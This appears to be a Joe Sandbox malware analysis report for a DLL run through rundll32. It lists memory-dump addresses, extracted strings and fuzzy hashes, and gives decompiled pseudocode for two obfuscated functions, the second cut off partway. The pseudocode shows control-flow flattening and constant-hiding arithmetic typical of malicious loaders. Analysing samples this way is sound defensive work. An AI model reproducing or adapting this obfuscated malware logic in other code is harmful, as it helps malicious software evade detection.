0x1001e99e
0x00000000
0x1001e923
0x1001e929
0x1001ebec
0x1001e92f
0x1001e935
0x00000000
0x1001e93b
0x1001e940
0x1001e957
0x1001e95b
0x1001e960
0x1001e967
0x1001e96f
0x00000000
0x1001e96f
0x1001e935
0x1001e929
0x1001e921
0x1001e915
0x1001e90d
0x1001ebf9
0x1001ec05
0x1001ec05
0x1001ea4c
0x1001eb79
0x1001eb96
0x1001eba4
0x1001eba9
0x1001ebae
0x1001ebba
0x00000000
0x1001ebb0
0x1001ebb0
0x00000000
0x1001ebb0
0x1001ea52
0x1001ea58
0x1001eb3e
0x1001eb5c
0x1001eb60
0x1001eb68
0x1001eb6a
0x1001eb6f
0x00000000
0x1001ea5e
0x1001ea64
0x1001eaeb
0x1001eaf5
0x1001eafb
0x1001eafc
0x00000000
0x1001ea66
0x1001ea6c
0x00000000
0x1001ea72
0x1001ea72
0x1001ea85
0x1001eabe
0x1001eac3
0x1001eaca
0x1001ead2
0x00000000
0x1001ead2
0x1001ea6c
0x1001ea64
0x1001ea58
0x00000000
0x1001ebbf
0x1001ebbf
0x00000000

Strings

'd, xrefs: 1001E78F
d/Q, xrefs: 1001E1DA
fC, xrefs: 1001E4DD
C=wU, xrefs: 1001E787
fA, xrefs: 1001E809
m2, xrefs: 1001E35A
.Y, xrefs: 1001E5D0
W}, xrefs: 1001E385
H, xrefs: 1001E4E8
^*, xrefs: 1001E21C
&o, xrefs: 1001E53C
mO, xrefs: 1001E856
!$, xrefs: 1001E74E
g0, xrefs: 1001E260
q, xrefs: 1001E894
0vz5, xrefs: 1001E40E
C, xrefs: 1001E8D3

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: q$!$$&o$'d$.Y$0vz5$C=wU$H$W}$^*$d/Q$fA$fC$g0$m2$mO$C
API String ID: 0-3046912973
Opcode ID: 7c72271ec2ee9b29a4bd603220aea34a566be452ea304f07fd4abb6d9bc15b99
Instruction ID: a67a5d6662a05d5da01197eb55bbec18b74cc61d11ec80b6fdc783dee153aef3
Opcode Fuzzy Hash: 7c72271ec2ee9b29a4bd603220aea34a566be452ea304f07fd4abb6d9bc15b99
Instruction Fuzzy Hash: 6B321671508380DFE3A8CF65C98AA4FBBE1FB84754F108A0DE5D9962A0D7B59948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10007E34, Relevance: 21.7, Strings: 17, Instructions: 464
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10007E34(intOrPtr __ecx, intOrPtr __edx) {
				char _v524;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				unsigned int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				void* _t497;
				intOrPtr _t500;
				intOrPtr _t502;
				intOrPtr _t505;
				void* _t510;
				intOrPtr _t514;
				intOrPtr _t516;
				intOrPtr _t524;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				signed int _t540;
				void* _t541;
				void* _t543;
				signed int _t598;
				intOrPtr _t599;
				signed int _t600;
				intOrPtr _t604;
				signed int* _t605;
				signed int* _t606;
				void* _t611;

				_t605 =  &_v732;
				_v548 = _v548 & 0x00000000;
				_v608 = 0x8e77;
				_v544 = __edx;
				_t604 = __ecx;
				_t600 = 0xf92d88;
				_t598 = 0x7f;
				_v608 = _v608 / _t598;
				_v608 = _v608 ^ 0x0200011f;
				_v664 = 0x5ee6;
				_v664 = _v664 >> 6;
				_t527 = 0x74;
				_v664 = _v664 * 0x3a;
				_v664 = _v664 ^ 0x00004336;
				_v724 = 0x97d5;
				_v724 = _v724 / _t527;
				_v724 = _v724 | 0x73d16624;
				_t528 = 0x48;
				_v724 = _v724 / _t528;
				_v724 = _v724 ^ 0x019bc567;
				_v684 = 0xe6c9;
				_v684 = _v684 << 4;
				_t529 = 0x2a;
				_v684 = _v684 / _t529;
				_t530 = 0xc;
				_v684 = _v684 * 0x45;
				_v684 = _v684 ^ 0x0017da0f;
				_v596 = 0x84c3;
				_v596 = _v596 >> 0xc;
				_v596 = _v596 ^ 0x00000094;
				_v716 = 0x73cc;
				_v716 = _v716 >> 5;
				_v716 = _v716 * 0x51;
				_v716 = _v716 + 0xffff7ccf;
				_v716 = _v716 ^ 0x000099a4;
				_v700 = 0xc2fe;
				_v700 = _v700 | 0x0147ff89;
				_v700 = _v700 >> 2;
				_v700 = _v700 + 0xffffed96;
				_v700 = _v700 ^ 0x0051cc5f;
				_v624 = 0x598b;
				_v624 = _v624 * 0x46;
				_v624 = _v624 / _t530;
				_v624 = _v624 ^ 0x00023e05;
				_v560 = 0x1a77;
				_v560 = _v560 / _t598;
				_v560 = _v560 ^ 0x000017c3;
				_v640 = 0x468b;
				_v640 = _v640 ^ 0xf8cef0f9;
				_v640 = _v640 ^ 0x157598e1;
				_v640 = _v640 ^ 0xedbb3f55;
				_v660 = 0x95cb;
				_v660 = _v660 ^ 0xe0385738;
				_t103 =  &_v660; // 0xe0385738
				_t531 = 0x34;
				_v660 =  *_t103 * 0x38;
				_v660 = _v660 ^ 0x0c6ae6d8;
				_v692 = 0x21c1;
				_v692 = _v692 / _t531;
				_t532 = 0x70;
				_v692 = _v692 * 0x25;
				_v692 = _v692 << 4;
				_v692 = _v692 ^ 0x00016ad5;
				_v592 = 0xa9db;
				_v592 = _v592 ^ 0x5846e700;
				_v592 = _v592 ^ 0x584631e9;
				_v600 = 0x3eca;
				_v600 = _v600 + 0x9bab;
				_v600 = _v600 ^ 0x0000ec74;
				_v672 = 0x247b;
				_v672 = _v672 + 0xffff7cea;
				_v672 = _v672 + 0xffff49cc;
				_v672 = _v672 ^ 0xfffef3f1;
				_v720 = 0x5bb8;
				_v720 = _v720 << 5;
				_v720 = _v720 << 0xe;
				_v720 = _v720 * 0x69;
				_v720 = _v720 ^ 0xf3c05410;
				_v604 = 0x12e;
				_v604 = _v604 ^ 0xcbcc0f39;
				_v604 = _v604 ^ 0xcbcc0717;
				_v676 = 0x4f1f;
				_v676 = _v676 + 0xffffd823;
				_v676 = _v676 ^ 0x00001628;
				_v668 = 0xa101;
				_v668 = _v668 / _t532;
				_v668 = _v668 << 7;
				_v668 = _v668 ^ 0x0000d0e8;
				_v712 = 0xf562;
				_v712 = _v712 + 0xe29d;
				_v712 = _v712 | 0xaf029352;
				_t533 = 0x2c;
				_v712 = _v712 / _t533;
				_v712 = _v712 ^ 0x03fa2878;
				_v584 = 0xa7c6;
				_v584 = _v584 ^ 0x2308cfbe;
				_v584 = _v584 ^ 0x23086838;
				_v696 = 0xba3e;
				_v696 = _v696 << 9;
				_v696 = _v696 ^ 0x7a641ee8;
				_v696 = _v696 >> 2;
				_v696 = _v696 ^ 0x1ec44f4b;
				_v568 = 0x7d1;
				_v568 = _v568 << 2;
				_v568 = _v568 ^ 0x00007750;
				_v704 = 0x3590;
				_v704 = _v704 * 0x4c;
				_v704 = _v704 << 2;
				_v704 = _v704 << 8;
				_v704 = _v704 ^ 0x3f9b76a0;
				_v576 = 0x6e4c;
				_v576 = _v576 << 8;
				_v576 = _v576 ^ 0x006e4c78;
				_v636 = 0xe1b3;
				_t534 = 0x38;
				_v636 = _v636 / _t534;
				_v636 = _v636 | 0xbc23d7c2;
				_v636 = _v636 ^ 0xbc23f6d4;
				_v644 = 0xc193;
				_v644 = _v644 + 0xffffe081;
				_v644 = _v644 | 0xe7ea23f6;
				_v644 = _v644 ^ 0xe7eab5c6;
				_v652 = 0xff18;
				_v652 = _v652 ^ 0x15e6b590;
				_v652 = _v652 | 0x9145bae2;
				_v652 = _v652 ^ 0x95e7a511;
				_v688 = 0x91dc;
				_v688 = _v688 << 0xf;
				_v688 = _v688 + 0xffffec69;
				_v688 = _v688 + 0x152;
				_v688 = _v688 ^ 0x48ede9e6;
				_v588 = 0xda26;
				_t535 = 0x43;
				_v588 = _v588 / _t535;
				_v588 = _v588 ^ 0x00003ef3;
				_v728 = 0x13e1;
				_v728 = _v728 << 5;
				_v728 = _v728 | 0x81597e77;
				_t536 = 0x67;
				_v728 = _v728 / _t536;
				_v728 = _v728 ^ 0x0141a54f;
				_v732 = 0xfe77;
				_v732 = _v732 ^ 0xa2bc77b9;
				_v732 = _v732 << 0xb;
				_t537 = 0x3d;
				_v732 = _v732 * 0x1f;
				_v732 = _v732 ^ 0xa57fc270;
				_v564 = 0xd716;
				_v564 = _v564 ^ 0x4072510d;
				_v564 = _v564 ^ 0x40729e8d;
				_v708 = 0xf6c2;
				_v708 = _v708 + 0xffff713e;
				_v708 = _v708 * 0xe;
				_v708 = _v708 / _t537;
				_v708 = _v708 ^ 0x00002963;
				_v580 = 0x83ac;
				_t538 = 0x4a;
				_v580 = _v580 / _t538;
				_v580 = _v580 ^ 0x000067e0;
				_v632 = 0xd307;
				_v632 = _v632 >> 0xb;
				_v632 = _v632 ^ 0x73d3f358;
				_v632 = _v632 ^ 0x73d3bdee;
				_v656 = 0x12d9;
				_v656 = _v656 | 0x78eb2603;
				_v656 = _v656 + 0xffffb5b9;
				_v656 = _v656 ^ 0x78eaf389;
				_v552 = 0x5776;
				_v552 = _v552 + 0x2f24;
				_v552 = _v552 ^ 0x00009a22;
				_v616 = 0x2c00;
				_v616 = _v616 + 0x792b;
				_v616 = _v616 + 0xffffa094;
				_v616 = _v616 ^ 0x00000aad;
				_v572 = 0x3f59;
				_v572 = _v572 | 0xe3450093;
				_v572 = _v572 ^ 0xe3451fd2;
				_v556 = 0x6ea6;
				_t539 = 0x1d;
				_t524 = _v544;
				_v556 = _v556 * 0x56;
				_v556 = _v556 ^ 0x002547d9;
				_v648 = 0xf811;
				_v648 = _v648 << 8;
				_v648 = _v648 ^ 0xcc5c85c7;
				_v648 = _v648 ^ 0xcca4883c;
				_v612 = 0xcfc1;
				_t599 = _v544;
				_v612 = _v612 * 0x33;
				_v612 = _v612 >> 1;
				_v612 = _v612 ^ 0x0014c5bf;
				_v620 = 0x3b04;
				_v620 = _v620 >> 3;
				_v620 = _v620 ^ 0x957054e4;
				_v620 = _v620 ^ 0x95705ef6;
				_v628 = 0x17ec;
				_v628 = _v628 / _t539;
				_v628 = _v628 + 0xffffc55c;
				_v628 = _v628 ^ 0xffffc912;
				_v680 = 0x1f47;
				_v680 = _v680 | 0x8760986b;
				_t540 = 0x6b;
				_v680 = _v680 / _t540;
				_v680 = _v680 + 0xeba5;
				_v680 = _v680 ^ 0x0144ccb9;
				while(1) {
					L1:
					_t497 = 0x22698256;
					while(1) {
						L2:
						_t541 = 0x37da4205;
						do {
							while(1) {
								L3:
								_t611 = _t600 - 0x1571d90b;
								if(_t611 > 0) {
									break;
								}
								if(_t611 == 0) {
									_t510 = E1000934C(_t541);
									__eflags = _t510 - E10014DBD();
									_t497 = 0x22698256;
									_t600 = 0x695d68;
									_t524 =  !=  ? 0x22698256 : 0xbd09969;
									while(1) {
										L2:
										_t541 = 0x37da4205;
										goto L3;
									}
								}
								if(_t600 == 0x695d68) {
									__eflags = _t524 - _t497;
									if(_t524 != _t497) {
										_t600 = 0xd0bbcc0;
										continue;
									} else {
										_push(_v608);
										E10004BDE(_v716, _v700,  &_v548, _v624, _t541);
										_t605 =  &(_t605[5]);
										asm("sbb esi, esi");
										_t600 = (_t600 & 0xff859553) + 0xd86276d;
										while(1) {
											L1:
											_t497 = 0x22698256;
											L2:
											_t541 = 0x37da4205;
											goto L3;
										}
									}
									L34:
								}
								if(_t600 != 0xf92d88) {
									if(_t600 == 0xd0bbcc0) {
										_push( &_v524);
										_push(0x10001318);
										_t516 = E10002628(_t604, _v544);
										__eflags = _t516;
										_t497 = 0x22698256;
										if(_t516 == 0) {
											__eflags = _t524 - 0x22698256;
											if(_t524 == 0x22698256) {
												E100078F0(_v548, _v560, _v640, _v660, _v692);
												_t605 =  &(_t605[3]);
												_t497 = 0x22698256;
											}
											_t600 = 0xd86276d;
											goto L2;
										} else {
											__eflags = _t524 - 0x22698256;
											_t541 = 0x37da4205;
											_t600 =  ==  ? 0x37da4205 : 0x39310db5;
											continue;
										}
									} else {
										if(_t600 == 0xd86276d) {
											return E100091CD(_v612, _v620, _v628, _t599, _v680);
										}
										goto L30;
									}
								}
								_push(_t541);
								_t543 = 0x24;
								_t514 = E100157E8(_t543);
								_t599 = _t514;
								__eflags = _t599;
								if(_t599 != 0) {
									_t600 = 0x1571d90b;
									while(1) {
										L1:
										_t497 = 0x22698256;
										goto L2;
									}
								}
								return _t514;
								goto L34;
							}
							__eflags = _t600 - _t541;
							if(_t600 == _t541) {
								_t500 = E1001D530(_v592,  &_v524, _v600, _v672,  &_v540, _v720, _v548, _v604);
								_t606 =  &(_t605[8]);
								__eflags = _t500;
								if(_t500 != 0) {
									E100078F0(_v540, _v676, _v668, _v712, _v584);
									E100078F0(_v536, _v696, _v568, _v704, _v576);
									_t606 =  &(_t606[6]);
								}
								E100078F0(_v548, _v636, _v644, _v652, _v688);
								_t605 =  &(_t606[3]);
								_t600 = 0x38dc6618;
								_t497 = 0x22698256;
								_t541 = 0x37da4205;
								goto L30;
							} else {
								__eflags = _t600 - 0x38dc6618;
								if(_t600 == 0x38dc6618) {
									 *((intOrPtr*)(_t599 + 0x20)) = _t604;
									_t502 =  *0x10021400; // 0x0
									 *((intOrPtr*)(_t599 + 0x10)) = _t502;
									 *0x10021400 = _t599;
									return _t502;
								}
								__eflags = _t600 - 0x39310db5;
								if(__eflags != 0) {
									goto L30;
								} else {
									_push(_v708);
									_push(0);
									_push(0);
									_push(_t541);
									_push(_v564);
									_push(_v732);
									_push( &_v524);
									_push( &_v540);
									_t505 = E100189F6(_v588, _v728, __eflags);
									_t605 =  &(_t605[8]);
									__eflags = _t505;
									if(_t505 != 0) {
										E100078F0(_v540, _v580, _v632, _v656, _v552);
										E100078F0(_v536, _v616, _v572, _v556, _v648);
										_t605 =  &(_t605[6]);
									}
									_t600 = 0x38dc6618;
									goto L1;
								}
							}
							goto L34;
							L30:
							__eflags = _t600 - 0x2870efef;
						} while (_t600 != 0x2870efef);
						return _t497;
					}
				}
			}

0x10007e34
0x10007e3a
0x10007e42
0x10007e52
0x10007e59
0x10007e5d
0x10007e64
0x10007e69
0x10007e70
0x10007e7b
0x10007e83
0x10007e8f
0x10007e92
0x10007e96
0x10007e9e
0x10007eae
0x10007eb2
0x10007ebe
0x10007ec3
0x10007ec7
0x10007ecf
0x10007ed7
0x10007ee2
0x10007ee7
0x10007ef2
0x10007ef3
0x10007ef7
0x10007eff
0x10007f0a
0x10007f12
0x10007f1d
0x10007f25
0x10007f2f
0x10007f33
0x10007f3b
0x10007f43
0x10007f4b
0x10007f53
0x10007f58
0x10007f60
0x10007f68
0x10007f75
0x10007f81
0x10007f85
0x10007f8d
0x10007fa1
0x10007fa8
0x10007fb3
0x10007fbb
0x10007fc3
0x10007fcb
0x10007fd3
0x10007fdd
0x10007fe5
0x10007fec
0x10007fef
0x10007ff3
0x10007ffb
0x1000800b
0x10008014
0x10008017
0x1000801b
0x10008020
0x10008028
0x10008033
0x1000803e
0x10008049
0x10008054
0x1000805f
0x1000806a
0x10008072
0x1000807a
0x10008082
0x1000808a
0x10008092
0x10008097
0x100080a1
0x100080a5
0x100080ad
0x100080b8
0x100080c3
0x100080ce
0x100080d6
0x100080e6
0x100080ee
0x100080fe
0x10008102
0x10008107
0x1000810f
0x10008117
0x1000811f
0x1000812b
0x1000812e
0x10008132
0x1000813a
0x10008145
0x10008150
0x1000815b
0x10008163
0x10008168
0x10008170
0x10008175
0x1000817d
0x10008188
0x10008190
0x1000819b
0x100081a8
0x100081ac
0x100081b1
0x100081b6
0x100081be
0x100081c9
0x100081d1
0x100081dc
0x100081ec
0x100081f1
0x100081f7
0x100081ff
0x10008207
0x1000820f
0x10008217
0x1000821f
0x10008227
0x1000822f
0x10008237
0x1000823f
0x10008247
0x1000824f
0x10008254
0x1000825c
0x10008264
0x1000826c
0x1000827e
0x10008283
0x1000828c
0x10008297
0x1000829f
0x100082a4
0x100082b0
0x100082b5
0x100082bb
0x100082c3
0x100082cb
0x100082d3
0x100082dd
0x100082e0
0x100082e4
0x100082ec
0x100082f7
0x10008302
0x1000830d
0x10008315
0x10008322
0x1000832e
0x10008332
0x1000833a
0x1000834c
0x1000834f
0x10008356
0x10008361
0x10008369
0x1000836e
0x10008376
0x1000837e
0x10008386
0x1000838e
0x10008396
0x1000839e
0x100083a9
0x100083b4
0x100083bf
0x100083ca
0x100083d5
0x100083e0
0x100083eb
0x100083f8
0x10008403
0x1000840e
0x10008423
0x10008426
0x1000842d
0x10008434
0x1000843f
0x10008447
0x1000844c
0x10008454
0x1000845c
0x1000846f
0x10008476
0x1000847d
0x10008484
0x1000848f
0x1000849a
0x100084a2
0x100084ad
0x100084b8
0x100084c8
0x100084cc
0x100084d4
0x100084dc
0x100084e4
0x100084f0
0x100084f3
0x100084f7
0x100084ff
0x10008507
0x10008507
0x10008507
0x1000850c
0x1000850c
0x1000850c
0x10008511
0x10008511
0x10008511
0x10008511
0x10008517
0x00000000
0x00000000
0x1000851d
0x10008660
0x1000866c
0x10008673
0x10008678
0x1000867d
0x1000850c
0x1000850c
0x1000850c
0x00000000
0x1000850c
0x1000850c
0x10008529
0x1000860b
0x1000860d
0x1000864b
0x00000000
0x1000860f
0x1000860f
0x1000862e
0x10008633
0x10008638
0x10008640
0x10008507
0x10008507
0x10008507
0x1000850c
0x1000850c
0x00000000
0x1000850c
0x10008507
0x00000000
0x1000860d
0x10008535
0x10008541
0x10008584
0x10008585
0x1000858c
0x10008592
0x10008594
0x1000859a
0x100085b0
0x100085b2
0x100085ce
0x100085d3
0x100085d6
0x100085d6
0x100085db
0x00000000
0x1000859c
0x1000859c
0x100085a3
0x100085a8
0x00000000
0x100085a8
0x10008543
0x10008549
0x00000000
0x1000856e
0x00000000
0x10008549
0x10008541
0x100085ed
0x100085f0
0x100085f1
0x100085f6
0x100085f9
0x100085fb
0x10008601
0x10008507
0x10008507
0x10008507
0x00000000
0x10008507
0x10008507
0x10008815
0x00000000
0x10008815
0x10008685
0x10008687
0x1000876b
0x10008770
0x10008773
0x10008775
0x10008791
0x100087b6
0x100087bb
0x100087bb
0x100087d5
0x100087da
0x100087dd
0x100087e2
0x100087e7
0x00000000
0x1000868d
0x1000868d
0x10008693
0x100087fa
0x100087fd
0x10008802
0x10008805
0x00000000
0x10008805
0x10008699
0x1000869f
0x00000000
0x100086a5
0x100086a5
0x100086b0
0x100086b2
0x100086b4
0x100086b5
0x100086bc
0x100086cb
0x100086d3
0x100086d4
0x100086d9
0x100086dc
0x100086de
0x100086fd
0x10008725
0x1000872a
0x1000872a
0x1000872d
0x00000000
0x1000872d
0x1000869f
0x00000000
0x100087ec
0x100087ec
0x100087ec
0x00000000
0x10008511
0x1000850c

Strings

xLn, xrefs: 100081D1
1FX, xrefs: 1000803E
Qr@, xrefs: 100082F7
8W8, xrefs: 10007FE5
c), xrefs: 10008332
h]i, xrefs: 10008523
p(, xrefs: 100087EC
^, xrefs: 10007E7B
Y?, xrefs: 100083EB
t, xrefs: 1000805F
+y, xrefs: 100083CA
$/, xrefs: 100083A9
H, xrefs: 10008264
{$, xrefs: 1000806A
g, xrefs: 10008356
h]i, xrefs: 10008678
Pw, xrefs: 10008190

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Qr@$$/$+y$8W8$Pw$Y?$c)$h]i$h]i$t$xLn${$$1FX$^$g$p($H
API String ID: 0-1563294895
Opcode ID: 171111c34be3d9b94ac95fd15d466b49e40bc1f9e22da6f9989ed6422f849ba4
Instruction ID: f7445f3b1b55f540d70f1e3b73910c5f00ddc209463d1ebaed6bac0f40c33f80
Opcode Fuzzy Hash: 171111c34be3d9b94ac95fd15d466b49e40bc1f9e22da6f9989ed6422f849ba4
Instruction Fuzzy Hash: 0F32117250C3818FE368CF25C949A8BBBE1FBC5748F10891DE6D9962A0D7B59909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001F411, Relevance: 20.4, Strings: 16, Instructions: 435
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1001F411() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				intOrPtr _v1568;
				char _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				unsigned int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				void* _t493;
				signed int _t495;
				signed int _t497;
				void* _t499;
				void* _t505;
				signed int _t516;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				void* _t530;
				void* _t533;
				void* _t539;
				void* _t581;
				signed int* _t586;

				_t586 =  &_v1764;
				_v1568 = 0x6bc4b7;
				_v1564 = 0;
				_v1616 = 0x7b31;
				_v1616 = _v1616 >> 5;
				_v1616 = _v1616 ^ 0x000003f0;
				_v1636 = 0x8aee;
				_v1636 = _v1636 << 6;
				_v1636 = _v1636 ^ 0xb9ff3183;
				_v1636 = _v1636 ^ 0x39dd8a02;
				_v1756 = 0x620;
				_v1756 = _v1756 | 0x6d559036;
				_v1756 = _v1756 << 8;
				_v1576 = 0;
				_t581 = 0x3875c21b;
				_t519 = 0x48;
				_v1756 = _v1756 / _t519;
				_v1756 = _v1756 ^ 0x01304efa;
				_v1684 = 0x5cfd;
				_t520 = 0x36;
				_v1684 = _v1684 * 0x52;
				_v1684 = _v1684 * 0x24;
				_v1684 = _v1684 ^ 0x04302f49;
				_v1628 = 0x396e;
				_v1628 = _v1628 * 0x28;
				_v1628 = _v1628 ^ 0x0008c3d7;
				_v1696 = 0x5408;
				_v1696 = _v1696 >> 0xc;
				_v1696 = _v1696 << 0xe;
				_v1696 = _v1696 << 1;
				_v1696 = _v1696 ^ 0x0002db53;
				_v1760 = 0x3df4;
				_v1760 = _v1760 * 0x61;
				_v1760 = _v1760 << 5;
				_v1760 = _v1760 / _t520;
				_v1760 = _v1760 ^ 0x000da470;
				_v1588 = 0x721a;
				_t521 = 0x47;
				_v1588 = _v1588 / _t521;
				_v1588 = _v1588 ^ 0x0000070f;
				_v1752 = 0x8c93;
				_v1752 = _v1752 << 0xa;
				_v1752 = _v1752 << 0xb;
				_v1752 = _v1752 | 0xe01a6e70;
				_v1752 = _v1752 ^ 0xf27a671c;
				_v1644 = 0xefc8;
				_t522 = 0x6d;
				_v1644 = _v1644 / _t522;
				_v1644 = _v1644 ^ 0x739099de;
				_v1644 = _v1644 ^ 0x7390cdd9;
				_v1596 = 0x1ffd;
				_v1596 = _v1596 ^ 0x86e06afb;
				_v1596 = _v1596 ^ 0x86e015b5;
				_v1652 = 0xc429;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 >> 6;
				_v1652 = _v1652 ^ 0x00006789;
				_v1600 = 0x57b4;
				_t523 = 0x7f;
				_v1600 = _v1600 / _t523;
				_v1600 = _v1600 ^ 0x00007042;
				_v1744 = 0xf601;
				_t524 = 0x2d;
				_v1744 = _v1744 * 0x77;
				_v1744 = _v1744 * 0x2a;
				_v1744 = _v1744 * 0x2c;
				_v1744 = _v1744 ^ 0x397d78f9;
				_v1592 = 0x85ab;
				_v1592 = _v1592 << 4;
				_v1592 = _v1592 ^ 0x00082bb5;
				_v1720 = 0xd613;
				_v1720 = _v1720 + 0x2992;
				_v1720 = _v1720 << 1;
				_v1720 = _v1720 | 0xcb6149df;
				_v1720 = _v1720 ^ 0xcb61901b;
				_v1676 = 0x443b;
				_v1676 = _v1676 ^ 0xd199ed1f;
				_v1676 = _v1676 >> 2;
				_v1676 = _v1676 ^ 0x34667475;
				_v1608 = 0x7ce3;
				_v1608 = _v1608 ^ 0x2b9fed51;
				_v1608 = _v1608 ^ 0x2b9fdb73;
				_v1728 = 0xb946;
				_v1728 = _v1728 * 0x68;
				_v1728 = _v1728 * 0x6e;
				_v1728 = _v1728 << 0xe;
				_v1728 = _v1728 ^ 0xda080bad;
				_v1712 = 0xe175;
				_v1712 = _v1712 / _t524;
				_t525 = 0x68;
				_v1712 = _v1712 * 0x62;
				_v1712 = _v1712 | 0xebea7309;
				_v1712 = _v1712 ^ 0xebebb48d;
				_v1736 = 0xa5be;
				_v1736 = _v1736 + 0xffff1e6a;
				_v1736 = _v1736 >> 8;
				_v1736 = _v1736 ^ 0xa9a874dc;
				_v1736 = _v1736 ^ 0xa957bb08;
				_v1704 = 0x444d;
				_t180 =  &_v1704; // 0x444d
				_v1704 =  *_t180 * 0x38;
				_v1704 = _v1704 | 0xc313ec5d;
				_v1704 = _v1704 + 0xffffc096;
				_v1704 = _v1704 ^ 0xc31fa060;
				_v1668 = 0x6d52;
				_t189 =  &_v1668; // 0x6d52
				_v1668 =  *_t189 * 0x65;
				_v1668 = _v1668 ^ 0xbf90cb27;
				_v1668 = _v1668 ^ 0xbfbbe0fd;
				_v1584 = 0x2582;
				_v1584 = _v1584 ^ 0xe6613b83;
				_v1584 = _v1584 ^ 0xe6615551;
				_v1764 = 0x94b;
				_v1764 = _v1764 + 0x67c4;
				_v1764 = _v1764 / _t525;
				_v1764 = _v1764 >> 3;
				_v1764 = _v1764 ^ 0x00001cca;
				_v1688 = 0x9e3b;
				_v1688 = _v1688 + 0x5941;
				_v1688 = _v1688 << 2;
				_v1688 = _v1688 ^ 0x0003cfbe;
				_v1748 = 0x3388;
				_v1748 = _v1748 >> 0xf;
				_v1748 = _v1748 ^ 0x81f115bf;
				_v1748 = _v1748 + 0xffff7117;
				_v1748 = _v1748 ^ 0x81f0c6d8;
				_v1620 = 0xeec5;
				_v1620 = _v1620 ^ 0x04d4525c;
				_v1620 = _v1620 ^ 0x04d4ab65;
				_v1624 = 0xdb2c;
				_v1624 = _v1624 << 1;
				_v1624 = _v1624 ^ 0x0001fe72;
				_v1580 = 0xb060;
				_v1580 = _v1580 + 0xae2;
				_v1580 = _v1580 ^ 0x0000f768;
				_v1660 = 0x96fa;
				_v1660 = _v1660 << 5;
				_v1660 = _v1660 | 0x6168c04a;
				_v1660 = _v1660 ^ 0x617aedf0;
				_v1672 = 0x7987;
				_v1672 = _v1672 | 0xba6a9da0;
				_v1672 = _v1672 + 0x37d3;
				_v1672 = _v1672 ^ 0xba6b374e;
				_v1680 = 0x436a;
				_v1680 = _v1680 + 0xffff28b9;
				_v1680 = _v1680 ^ 0xc211608a;
				_v1680 = _v1680 ^ 0x3dee43d2;
				_v1740 = 0x7dd0;
				_v1740 = _v1740 ^ 0x30cdb3c0;
				_v1740 = _v1740 ^ 0xa86be54c;
				_v1740 = _v1740 + 0xffffb5e9;
				_v1740 = _v1740 ^ 0x98a5bc8c;
				_v1612 = 0x1a91;
				_v1612 = _v1612 << 0xe;
				_v1612 = _v1612 ^ 0x06a46876;
				_v1664 = 0x6ac2;
				_v1664 = _v1664 ^ 0xd8b61fc6;
				_v1664 = _v1664 ^ 0x1ea3be60;
				_v1664 = _v1664 ^ 0xc615e743;
				_v1732 = 0x55c4;
				_v1732 = _v1732 >> 0xf;
				_v1732 = _v1732 + 0xffffedaa;
				_t526 = 0xa;
				_v1732 = _v1732 * 0x58;
				_v1732 = _v1732 ^ 0xfff9af4a;
				_v1604 = 0x92de;
				_v1604 = _v1604 >> 8;
				_v1604 = _v1604 ^ 0x000052ef;
				_v1640 = 0x375a;
				_v1640 = _v1640 ^ 0x8d7c695b;
